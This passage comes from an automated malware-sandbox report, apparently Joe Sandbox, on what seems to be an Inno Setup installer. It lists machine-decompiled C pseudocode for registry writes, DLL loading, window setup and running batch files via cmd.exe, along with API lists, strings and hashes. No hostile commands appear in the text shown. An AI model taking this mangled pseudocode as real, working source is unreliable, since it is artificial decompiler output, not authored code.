																_t402 = E004036BC(_v20);
																_t561 = _v20;
																__eflags =  *((char*)(_t561 + _t402 - 1));
																if( *((char*)(_t561 + _t402 - 1)) != 0) {
																	E004036C4( &_v20, 0x46b8f8);
																}
															}
														} else {
															_t411 = E004039A4("{olddata}",  *((intOrPtr*)(_v56 + 8)));
															__eflags = _t411;
															if(_t411 == 0) {
																L48:
																E00403548( &_v24);
															} else {
																E00403880(_v16);
																_t429 = E0042DCB8();
																__eflags = _t429;
																if(_t429 == 0) {
																	goto L48;
																}
															}
															_t414 = _v56;
															__eflags =  *(_t414 + 0x3f) & 0x00000020;
															if(( *(_t414 + 0x3f) & 0x00000020) != 0) {
																_t425 = RegQueryValueExA(_v8, E00403880(_v16), 0,  &_v28, 0, 0);
																__eflags = _t425;
																if(_t425 == 0) {
																	__eflags = _v28 - 1;
																	if(_v28 == 1) {
																		L53:
																		_t512 = _v28;
																	} else {
																		__eflags = _v28 - 2;
																		if(_v28 == 2) {
																			goto L53;
																		}
																	}
																}
															}
															_v64 = "olddata";
															_v60 = _v24;
															E00471818( *((intOrPtr*)(_v56 + 8)), _t512, 1,  &_v64, _t581, _t582, _t609,  &_v20);
														}
														_push(E004036BC(_v20) + 1);
														_push(E00403880(_v20));
														_push(_t512);
														_push(0);
														_push(E00403880(_v16));
														_t396 = _v8;
														_push(_t396); // executed
														L00405934(); // executed
														_t513 = _t396;
														__eflags = _t513;
														if(_t513 != 0) {
															__eflags =  *(_v56 + 0x40) & 0x00000001;
															if(__eflags == 0) {
																E0046755C(0, _t513, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582, __eflags, _t513);
															}
														}
													} else {
														if(__eflags == 0) {
															E004717F8( *((intOrPtr*)(_v56 + 8)), _t519,  &_v84);
															_v32 = E00406E34(_v84, _t519);
															_push(4);
															_push( &_v32);
															_push(4);
															_push(0);
															_push(E00403880(_v16));
															_t438 = _v8;
															_push(_t438);
															L00405934();
															_t514 = _t438;
															__eflags = _t514;
															if(_t514 != 0) {
																__eflags =  *(_v56 + 0x40) & 0x00000001;
																if(__eflags == 0) {
																	E0046755C(0, _t514, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582, __eflags, _t514);
																}
															}
														} else {
															_t570 = _t555 - 1;
															__eflags = _t570;
															if(_t570 == 0) {
																_push(E004036BC( *((intOrPtr*)(_v56 + 8))));
																_push(E00403880( *((intOrPtr*)(_v56 + 8))));
																_push(3);
																_push(0);
																_push(E00403880(_v16));
																_t451 = _v8;
																_push(_t451);
																L00405934();
																_t515 = _t451;
																__eflags = _t515;
																if(_t515 != 0) {
																	_t452 = _v56;
																	__eflags =  *(_t452 + 0x40) & 0x00000001;
																	if(( *(_t452 + 0x40) & 0x00000001) == 0) {
																		__eflags = 0;
																		E0046755C(0, _t515, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582, 0, _t515);
																	}
																}
															} else {
																__eflags = _t570 == 1;
																if(_t570 == 1) {
																	goto L40;
																}
															}
														}
													}
												} else {
													_t459 = E0042DCD0(_v8, E00403880(_v16));
													__eflags = _t459;
													if(_t459 == 0) {
														goto L36;
													}
												}
											}
											__eflags = 0;
											_pop(_t552);
											 *[fs:eax] = _t552;
											_push(0x46b701);
											return RegCloseKey(_v8);
										}
									} else {
										if(E0042DD88(_v37, E00403880(_v36),  *((intOrPtr*)(_v56 + 0x38)),  &_v8, 2, 0) == 0) {
											_push(E00403880(_v16));
											_push(_v8);
											L004058FC();
											RegCloseKey(_v8);
										}
										goto L71;
									}
								} else {
									goto L71;
								}
								goto L86;
								L71:
								_pop(_t546);
								 *[fs:eax] = _t546;
							} while (_v45 != 0);
							if(( *(_v56 + 0x3f) & 0x00000008) != 0 && E0046B04C(_v36) != 0) {
								_v88 = _v36;
								E00457078( *((intOrPtr*)(_a4 - 4)), _v37, 0,  &_v88,  *((intOrPtr*)(_v56 + 0x38)));
							}
							if(( *(_v56 + 0x3f) & 0x00000010) != 0 && E0046B04C(_v36) != 0) {
								_v88 = _v36;
								E00457078( *((intOrPtr*)(_a4 - 4)), _v37, 0,  &_v88,  *((intOrPtr*)(_v56 + 0x38)));
							}
							if(( *(_v56 + 0x3f) & 0x00000002) != 0) {
								_v64 = _v36;
								_v60 = _v16;
								E00457078( *((intOrPtr*)(_a4 - 4)), _v37, 1,  &_v64,  *((intOrPtr*)(_v56 + 0x38)));
							}
							if(( *(_v56 + 0x3f) & 0x00000004) != 0) {
								_v64 = _v36;
								_v60 = _v16;
								E00457078( *((intOrPtr*)(_a4 - 4)), _v37, 1,  &_v64,  *((intOrPtr*)(_v56 + 0x38)));
							}
							E0046EF24();
						}
						goto L84;
						L84:
						_v44 =  &(_v44[0]);
						_t271 =  &_v52;
						 *_t271 = _v52 - 1;
						_t607 =  *_t271;
					} while ( *_t271 != 0);
					goto L85;
				}
				L86:
			}

0x0046b194
0x0046b194
0x0046b194
0x0046b195
0x0046b197
0x0046b19a
0x0046b19b
0x0046b19c
0x0046b19f
0x0046b1a2
0x0046b1a5
0x0046b1a8
0x0046b1ab
0x0046b1b0
0x0046b1b1
0x0046b1b6
0x0046b1b9
0x0046b1bc
0x0046b1c4
0x0046b1c7
0x0046b830
0x0046b835
0x0046b83c
0x0046b83f
0x0046b842
0x0046b84a
0x0046b852
0x0046b864
0x0046b1cd
0x0046b1ce
0x0046b1d1
0x0046b1d8
0x0046b1db
0x0046b1e5
0x0046b200
0x0046b203
0x0046b209
0x0046b215
0x0046b220
0x0046b22b
0x0046b238
0x0046b246
0x0046b24b
0x0046b250
0x0046b25a
0x0046b25c
0x0046b25c
0x0046b267
0x0046b269
0x0046b270
0x0046b277
0x0046b277
0x0046b27c
0x0046b27c
0x0046b280
0x0046b280
0x0046b286
0x0046b287
0x0046b28c
0x0046b28f
0x0046b299
0x0046b2ba
0x0046b2ba
0x0046b2c6
0x0046b2dc
0x0046b337
0x0046b343
0x0046b348
0x0046b34b
0x0046b34f
0x0046b3c2
0x0046b3c5
0x0046b3c9
0x0046b412
0x0046b3cb
0x0046b3db
0x0046b3eb
0x0046b3ed
0x0046b3ef
0x0046b3f1
0x0046b3f4
0x0046b3f9
0x0046b3fd
0x0046b400
0x0046b40b
0x0046b40b
0x0046b3fd
0x0046b3f4
0x0046b3ef
0x0046b351
0x0046b36b
0x0046b376
0x0046b37b
0x0046b37d
0x0046b37f
0x0046b3a9
0x0046b3ad
0x0046b3b0
0x0046b3bb
0x0046b3bb
0x0046b381
0x0046b381
0x0046b385
0x0046b393
0x0046b39f
0x0046b39f
0x0046b385
0x0046b37f
0x0046b417
0x0046b419
0x00000000
0x0046b41f
0x0046b421
0x0046b422
0x0046b427
0x0046b42a
0x0046b42d
0x0046b430
0x0046b434
0x0046b43e
0x0046b442
0x0046b443
0x0046b443
0x0046b448
0x0046b44b
0x0046b44f
0x0046b455
0x0046b458
0x0046b45c
0x0046b478
0x0046b47b
0x0046b481
0x0046b481
0x0046b484
0x0046b49c
0x0046b49c
0x0046b4a3
0x0046b4a3
0x0046b4a6
0x0046b4af
0x0046b4a8
0x0046b4a8
0x0046b4ab
0x0046b4b6
0x0046b4b6
0x0046b4ab
0x0046b4bb
0x0046b4bd
0x0046b565
0x0046b56a
0x0046b56c
0x0046b587
0x0046b58a
0x0046b56e
0x0046b571
0x0046b57e
0x0046b583
0x0046b585
0x00000000
0x00000000
0x0046b585
0x0046b598
0x0046b59e
0x0046b5a6
0x0046b5ae
0x0046b5bf
0x0046b5c4
0x0046b5c8
0x0046b5cd
0x0046b5d2
0x0046b5d5
0x0046b5da
0x0046b5e4
0x0046b5e4
0x0046b5da
0x0046b4c3
0x0046b4ce
0x0046b4d3
0x0046b4d5
0x0046b4f0
0x0046b4f3
0x0046b4d7
0x0046b4da
0x0046b4e7
0x0046b4ec
0x0046b4ee
0x00000000
0x00000000
0x0046b4ee
0x0046b4f8
0x0046b4fb
0x0046b4ff
0x0046b518
0x0046b51d
0x0046b51f
0x0046b521
0x0046b525
0x0046b52d
0x0046b52d
0x0046b527
0x0046b527
0x0046b52b
0x00000000
0x00000000
0x0046b52b
0x0046b525
0x0046b51f
0x0046b539
0x0046b53f
0x0046b550
0x0046b550
0x0046b5f2
0x0046b5fb
0x0046b5fc
0x0046b5fd
0x0046b607
0x0046b608
0x0046b60b
0x0046b60c
0x0046b611
0x0046b613
0x0046b615
0x0046b61e
0x0046b622
0x0046b634
0x0046b634
0x0046b622
0x0046b486
0x0046b486
0x0046b647
0x0046b654
0x0046b657
0x0046b65c
0x0046b65d
0x0046b65f
0x0046b669
0x0046b66a
0x0046b66d
0x0046b66e
0x0046b673
0x0046b675
0x0046b677
0x0046b67c
0x0046b680
0x0046b68e
0x0046b68e
0x0046b680
0x0046b48c
0x0046b48c
0x0046b48c
0x0046b48e
0x0046b6a0
0x0046b6ac
0x0046b6ad
0x0046b6af
0x0046b6b9
0x0046b6ba
0x0046b6bd
0x0046b6be
0x0046b6c3
0x0046b6c5
0x0046b6c7
0x0046b6c9
0x0046b6cc
0x0046b6d0
0x0046b6dc
0x0046b6de
0x0046b6de
0x0046b6d0
0x0046b494
0x0046b494
0x0046b496
0x00000000
0x00000000
0x0046b496
0x0046b48e
0x0046b486
0x0046b45e
0x0046b46b
0x0046b470
0x0046b472
0x00000000
0x00000000
0x0046b472
0x0046b45c
0x0046b6e3
0x0046b6e5
0x0046b6e8
0x0046b6eb
0x0046b6f9
0x0046b6f9
0x0046b2e7
0x0046b309
0x0046b317
0x0046b31b
0x0046b31c
0x0046b325
0x0046b325
0x00000000
0x0046b309
0x00000000
0x00000000
0x00000000
0x00000000
0x0046b701
0x0046b703
0x0046b706
0x0046b733
0x0046b744
0x0046b75c
0x0046b772
0x0046b772
0x0046b77e
0x0046b796
0x0046b7ac
0x0046b7ac
0x0046b7b8
0x0046b7c4
0x0046b7ca
0x0046b7e0
0x0046b7e0
0x0046b7ec
0x0046b7f8
0x0046b7fe
0x0046b814
0x0046b814
0x0046b81f
0x0046b81f
0x00000000
0x0046b824
0x0046b824
0x0046b827
0x0046b827
0x0046b827
0x0046b827
0x00000000
0x0046b1d8
0x00000000

APIs

6D2B6690.ADVAPI32(?,00000000,?,00000002,00000000,00000000,0046B70B,?,?,?,?,00000000,0046B865,?,?,00000001), ref: 0046B31C
RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,0046B70B,?,?,?,?,00000000,0046B865,?,?), ref: 0046B325
6D2B6690.ADVAPI32(?,00000000,00000000,0046B6FA,?,?,00000000,0046B70B,?,?,?,?,00000000,0046B865,?,?), ref: 0046B443

Part of subcall function 0042DD50: 6D2B64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD7C

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,0046B6FA,?,?,00000000,0046B70B,?,?,?,?), ref: 0046B518
6D2B68C0.ADVAPI32(?,00000000,00000000,00000002,00000000,00000001,?,00000000,0046B6FA,?,?,00000000,0046B70B,?,?,?), ref: 0046B60C
6D2B68C0.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,0046B6FA,?,?,00000000,0046B70B,?,?,?,?), ref: 0046B66E
6D2B68C0.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000,00000000,0046B6FA,?,?,00000000,0046B70B,?,?,?,?), ref: 0046B6BE
RegCloseKey.ADVAPI32(?,0046B701,?,00000000,0046B70B,?,?,?,?,00000000,0046B865,?,?,00000001,004AE064), ref: 0046B6F4

Strings

break, xrefs: 0046B5A1
olddata, xrefs: 0046B534, 0046B593
{olddata}, xrefs: 0046B4C9, 0046B560
dJ, xrefs: 0046B5A9, 0046B5DF
Cannot access 64-bit registry keys on this version of Windows, xrefs: 0046B272

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6690Close$QueryValue
String ID: Cannot access 64-bit registry keys on this version of Windows$break$dJ$olddata${olddata}
API String ID: 1462715505-3083077437
Opcode ID: d992d7919b99ce34bf5de79344e5a8bf2ba076acaf4423398c5f2fa2490bb6e1
Instruction ID: 01694e1ff285958ebf4f6257c4e02e8b26cc028325eb5f9c98dca4764fc6d455
Opcode Fuzzy Hash: d992d7919b99ce34bf5de79344e5a8bf2ba076acaf4423398c5f2fa2490bb6e1
Instruction Fuzzy Hash: 70222D74A05248AFDB11DB99D985B9EB7F9EF08304F104066F804EB3A2D738AD45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00472110 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00472110(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t32;
				void* _t39;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t70;
				intOrPtr _t82;
				void* _t89;
				void* _t91;

				_t91 = __eflags;
				_t86 = __esi;
				_t85 = __edi;
				_t69 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_v8 = 0;
				_push(_t89);
				_push(0x47224b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89 + 0xffffffe0;
				_t32 =  *0x4ae018; // 0x21fdbec
				E0042C614(_t32,  &_v28);
				E00403708( &_v8, "_isetup\\_shfoldr.dll", _v28);
				E00471F04("SHFOLDERDLL", __ebx, _v8, __edi, __esi, _t91); // executed
				_t39 = E0045130C( &_v24);
				_t92 = _t39;
				if(_t39 == 0) {
					E00451AFC("Failed to get version numbers of _shfoldr.dll", _t69, _t85, _t86, _t92);
				}
				if(E0045130C( &_v16) == 0 || _v16 <= _v24 && (_v16 != _v24 || _v12 <= _v20)) {
					if(_v16 == _v24 && _v12 == _v20) {
						goto L8;
					}
				} else {
					L8:
					E004035DC( &_v8, "shfolder.dll");
				}
				E0042E324("shell32.dll", _t69, 0x8000); // executed
				_t46 = E0042E324(_v8, _t69, 0x8000); // executed
				 *0x4ae30c = _t46;
				if( *0x4ae30c == 0) {
					_v36 = _v8;
					_v32 = 0xb;
					E00407B08("Failed to load DLL \"%s\"", 0,  &_v36,  &_v28);
					E00451AFC(_v28, _t69, _t85, _t86, 0);
				}
				_push("SHGetFolderPathA");
				_t47 =  *0x4ae30c; // 0x74100000
				_push(_t47);
				L00405AA4();
				_t70 = _t47;
				 *0x4ae310 = _t70;
				_t101 = _t70;
				if(_t70 == 0) {
					E00451AFC("Failed to get address of SHGetFolderPathA function", _t70, _t85, _t86, _t101);
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E00472252);
				E00403548( &_v28);
				return E00403548( &_v8);
			}

0x00472110
0x00472110
0x00472110
0x00472110
0x00472116
0x00472117
0x00472118
0x0047211b
0x0047211e
0x00472123
0x00472124
0x00472129
0x0047212c
0x00472132
0x00472137
0x00472147
0x00472154
0x0047215f
0x00472164
0x00472166
0x0047216d
0x0047216d
0x00472181
0x004721a1
0x00000000
0x00000000
0x004721ab
0x004721ab
0x004721b3
0x004721b3
0x004721c2
0x004721cf
0x004721d4
0x004721e0
0x004721e9
0x004721ec
0x004721fa
0x00472202
0x00472202
0x00472207
0x0047220c
0x00472211
0x00472212
0x00472217
0x00472219
0x0047221f
0x00472221
0x00472228
0x00472228
0x0047222f
0x00472232
0x00472235
0x0047223d
0x0047224a

APIs

6D2B5550.KERNEL32(74100000,SHGetFolderPathA,00000000,0047224B), ref: 00472212

Strings

_isetup\_shfoldr.dll, xrefs: 00472142
shfolder.dll, xrefs: 00472175, 004721AE
SHFOLDERDLL, xrefs: 0047214F
Failed to get address of SHGetFolderPathA function, xrefs: 00472223
Failed to load DLL "%s", xrefs: 004721F5
Failed to get version numbers of _shfoldr.dll, xrefs: 00472168
SHGetFolderPathA, xrefs: 00472207
shell32.dll, xrefs: 004721BD

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550
String ID: Failed to get address of SHGetFolderPathA function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
API String ID: 2242650566-1072092678
Opcode ID: b2057ff779a8762d3f6688f2d2d644b6ca0b9fdb815c64315f38aa6c4da74f5d
Instruction ID: 4d659d619a20f97824347212721512af1cb6d97414f9a3320b65cb76e677aa76
Opcode Fuzzy Hash: b2057ff779a8762d3f6688f2d2d644b6ca0b9fdb815c64315f38aa6c4da74f5d
Instruction Fuzzy Hash: 73311E34A001099BDF10EB96DA819DEBBF4EB45304F90C9A6E904E7252D7B8AE05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423A8C Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00423A8C(int __eax, void* __edi, void* __esi) {
				void* __ebx;
				int _t12;
				long _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t15;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				struct HINSTANCE__* _t21;
				void* _t23;
				CHAR* _t24;
				struct HWND__* _t25;
				long _t38;
				struct HINSTANCE__* _t41;
				int _t45;
				struct HMENU__* _t46;
				struct _WNDCLASSA* _t54;
				short _t57;

				_t12 = __eax;
				_t45 = __eax;
				if( *((char*)(__eax + 0x7e)) != 0) {
					L12:
					return _t12;
				}
				_t13 = E0041F5DC(E00423E24, __eax); // executed
				 *(_t45 + 0x24) = _t13;
				_t14 =  *0x48c658; // 0x423894
				_t15 =  *0x48d014; // 0x400000
				if(GetClassInfoA(_t15, _t14, _t54) == 0) {
					_t41 =  *0x48d014; // 0x400000
					 *0x48c644 = _t41;
					_t57 = RegisterClassA( &E0048C634);
					if(_t57 == 0) {
						E00408EA0(_t45, 0xf02c, 1, __edi, __esi);
						E00403264();
					}
				}
				_t17 = GetSystemMetrics(0); // executed
				_t18 = _t17 >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t18);
				_t20 = GetSystemMetrics(1) >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t21 =  *0x48d014; // 0x400000
				_push(_t21);
				_push(0);
				_t3 = _t45 + 0x6c; // 0x20040
				_t23 = E00403880( *_t3);
				_t24 =  *0x48c658; // 0x423894, executed
				_t25 = E004063FC(_t24, 0x94ca0000, _t23); // executed
				 *(_t45 + 0x20) = _t25;
				_t5 = _t45 + 0x6c; // 0x41f028
				E00403548(_t5);
				 *((char*)(_t45 + 0x7e)) = 1;
				_t7 = _t45 + 0x20; // 0x410868
				E00423864( *_t7, 9, _t57);
				_t8 = _t45 + 0x24; // 0x4238a4
				_t9 = _t45 + 0x20; // 0x410868
				SetWindowLongA( *_t9, 0xfffffffc,  *_t8);
				if( *0x48d5c4 != 0) {
					_t38 = E00424390(_t45);
					_t10 = _t45 + 0x20; // 0x410868
					SendMessageA( *_t10, 0x80, 1, _t38); // executed
				}
				_t11 = _t45 + 0x20; // 0x410868
				_t46 = GetSystemMenu( *_t11, 0);
				DeleteMenu(_t46, 0xf030, 0);
				_t12 = DeleteMenu(_t46, 0xf000, 0);
				if( *0x48d5c4 == 0) {
					goto L12;
				} else {
					return DeleteMenu(_t46, 0xf010, 0);
				}
			}

0x00423a8c
0x00423a90
0x00423a96
0x00423bc3
0x00423bc3
0x00423bc3
0x00423aa2
0x00423aa7
0x00423aab
0x00423ab1
0x00423abe
0x00423ac0
0x00423ac5
0x00423ad4
0x00423ad7
0x00423ae5
0x00423aea
0x00423aea
0x00423ad7
0x00423af1
0x00423af6
0x00423af8
0x00423afa
0x00423afa
0x00423afd
0x00423b05
0x00423b07
0x00423b09
0x00423b09
0x00423b0c
0x00423b0d
0x00423b0f
0x00423b11
0x00423b13
0x00423b15
0x00423b1a
0x00423b1b
0x00423b1d
0x00423b20
0x00423b2c
0x00423b31
0x00423b36
0x00423b39
0x00423b3c
0x00423b41
0x00423b4a
0x00423b4d
0x00423b52
0x00423b58
0x00423b5c
0x00423b68
0x00423b6c
0x00423b79
0x00423b7d
0x00423b7d
0x00423b84
0x00423b8d
0x00423b97
0x00423ba4
0x00423bb0
0x00000000
0x00423bb2
0x00000000
0x00423bba

APIs

Part of subcall function 0041F5DC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EFBC,?,00423AA7,00423E24,0041EFBC), ref: 0041F5FA

GetClassInfoA.USER32 ref: 00423AB7
RegisterClassA.USER32 ref: 00423ACF
GetSystemMetrics.USER32 ref: 00423AF1
GetSystemMetrics.USER32 ref: 00423B00
SetWindowLongA.USER32 ref: 00423B5C
SendMessageA.USER32 ref: 00423B7D
GetSystemMenu.USER32(00410868,00000000,00410868,000000FC,004238A4,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00400000), ref: 00423B88
DeleteMenu.USER32(00000000,0000F030,00000000,00410868,00000000,00410868,000000FC,004238A4,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423B97
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410868,00000000,00410868,000000FC,004238A4,00000000,00400000,00000000,00000000,00000000), ref: 00423BA4
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410868,00000000,00410868,000000FC,004238A4,00000000,00400000), ref: 00423BBA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: 9e71ee787bd2ec52a7732bf14790ce16d15fb10fd29a2c8fa016684c2ebd8718
Instruction ID: 736c748f93f9c3fc699459295d6178eef5ef0b12aa3244549864bfee77555d49
Opcode Fuzzy Hash: 9e71ee787bd2ec52a7732bf14790ce16d15fb10fd29a2c8fa016684c2ebd8718
Instruction Fuzzy Hash: 413145B17412106AEB10BF69DC82F6A37989B04709F21057EBA41EE2D3DA7DED04876C

Uniqueness

Uniqueness Score: -1.00%

Function 00453454 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00453454(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, short _a12, char _a24) {
				char _v5;
				char _v12;
				char _v20;
				short _v40;
				intOrPtr _v44;
				char _v88;
				char _v104;
				char _v108;
				char _v112;
				signed int _t70;
				void* _t101;
				intOrPtr _t116;
				intOrPtr _t118;
				void* _t130;
				char _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t102 = __ecx;
				_t133 = _t134;
				_t135 = _t134 + 0xffffff94;
				_v108 = 0;
				_v112 = 0;
				_v12 = 0;
				_t130 = __edx;
				_t101 = __eax;
				E00403870(_a24);
				_push(_t133);
				_push(0x4536b8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				_push(0x4536d4);
				_push(_t130);
				_push(0x4536d4);
				E0040377C();
				_t136 = __ecx;
				if(__ecx != 0) {
					_push(_v12);
					_push(0x4536e0);
					_push(__ecx);
					E0040377C();
				}
				E0042C9E8(_t130, _t102,  &_v108, _t136);
				_t54 = E00406B28(_v108, 0x4536ec);
				_t137 = _t54;
				if(_t54 == 0) {
					L4:
					if(E0042DB78(_t54) == 0) {
						_push(0x4536d4);
						E0042D8B4( &_v112);
						E0042C614(_v112,  &_v108);
						_push(_v108);
						_push("COMMAND.COM\" /C ");
						_push(_v12);
						E0040377C();
					} else {
						_push(0x4536d4);
						E0042D8E0( &_v112);
						E0042C614(_v112,  &_v108);
						_push(_v108);
						_push("cmd.exe\" /C \"");
						_push(_v12);
						_push(0x4536d4);
						E0040377C();
					}
				} else {
					E0042C9E8(_t130, _t102,  &_v108, _t137);
					if(E00406B28(_v108, 0x4536fc) == 0) {
						goto L4;
					}
				}
				if(_a24 == 0) {
					E0042C990(_t130, _t102,  &_a24);
				}
				E00402A64( &_v88, 0x44);
				_v88 = 0x44;
				_v44 = 1;
				_v40 = _a12;
				if(_a24 == 0) {
					_t131 = 0;
					__eflags = 0;
				} else {
					_t131 = E00403880(_a24);
				}
				if(E00451338(_t101,  &_v20) != 0) {
					_push(_t133);
					_push(0x453630);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					_push( &_v104);
					_push( &_v88);
					_push(_t131);
					_push(0);
					_push(0x4000000);
					_push(0);
					_push(0);
					_push(0);
					_t70 = E00403880(_v12);
					_push(_t70);
					_push(0); // executed
					L0040597C(); // executed
					asm("sbb eax, eax");
					_v5 =  ~( ~_t70);
					__eflags = _v5;
					if(_v5 != 0) {
						__eflags = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(E00453637);
						return E00451374( &_v20);
					} else {
						 *_a4 = GetLastError();
						E00403304();
						goto L17;
					}
				} else {
					 *_a4 = GetLastError();
					_v5 = 0;
					L17:
					_pop(_t118);
					 *[fs:eax] = _t118;
					_push(E004536BF);
					E00403568( &_v112, 2);
					E00403548( &_v12);
					return E00403548( &_a24);
				}
			}

0x00453454
0x00453455
0x00453457
0x0045345f
0x00453462
0x00453465
0x0045346a
0x0045346c
0x00453471
0x00453478
0x00453479
0x0045347e
0x00453481
0x00453484
0x00453489
0x0045348a
0x00453497
0x0045349c
0x0045349e
0x004534a0
0x004534a3
0x004534a8
0x004534b1
0x004534b1
0x004534bb
0x004534c8
0x004534cd
0x004534cf
0x004534ec
0x004534f3
0x0045352c
0x00453534
0x0045353f
0x00453544
0x00453547
0x0045354c
0x00453557
0x004534f5
0x004534f5
0x004534fd
0x00453508
0x0045350d
0x00453510
0x00453515
0x00453518
0x00453525
0x00453525
0x004534d1
0x004534d6
0x004534ea
0x00000000
0x00000000
0x004534ea
0x00453560
0x00453567
0x00453567
0x00453576
0x0045357b
0x00453582
0x0045358d
0x00453595
0x004535a3
0x004535a3
0x00453597
0x0045359f
0x0045359f
0x004535b1
0x004535c8
0x004535c9
0x004535ce
0x004535d1
0x004535d7
0x004535db
0x004535dc
0x004535dd
0x004535df
0x004535e4
0x004535e6
0x004535e8
0x004535ed
0x004535f2
0x004535f3
0x004535f5
0x004535fc
0x00453600
0x00453603
0x00453607
0x0045361a
0x0045361c
0x0045361f
0x00453622
0x0045362f
0x00453609
0x00453611
0x00453613
0x00000000
0x00453613
0x004535b3
0x004535bb
0x004535bd
0x0045368d
0x0045368f
0x00453692
0x00453695
0x004536a2
0x004536aa
0x004536b7
0x004536b7

APIs

GetLastError.KERNEL32(?,COMMAND.COM" /C ,?,004536D4,004536D4,00000000,004536D4,00000000,004536B8,?,?,?,00000001), ref: 004535B3

Part of subcall function 0042D8B4: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00452384,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000,00000000,?,0048AA79), ref: 0042D8C7

6D747180.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453630,?,?,COMMAND.COM" /C ,?), ref: 004535F5
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453630,?,?,COMMAND.COM" /C ,?), ref: 00453609

Strings

COMMAND.COM" /C , xrefs: 00453547
D, xrefs: 0045357B
cmd.exe" /C ", xrefs: 00453510
.bat, xrefs: 004534C3
.cmd, xrefs: 004534DE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
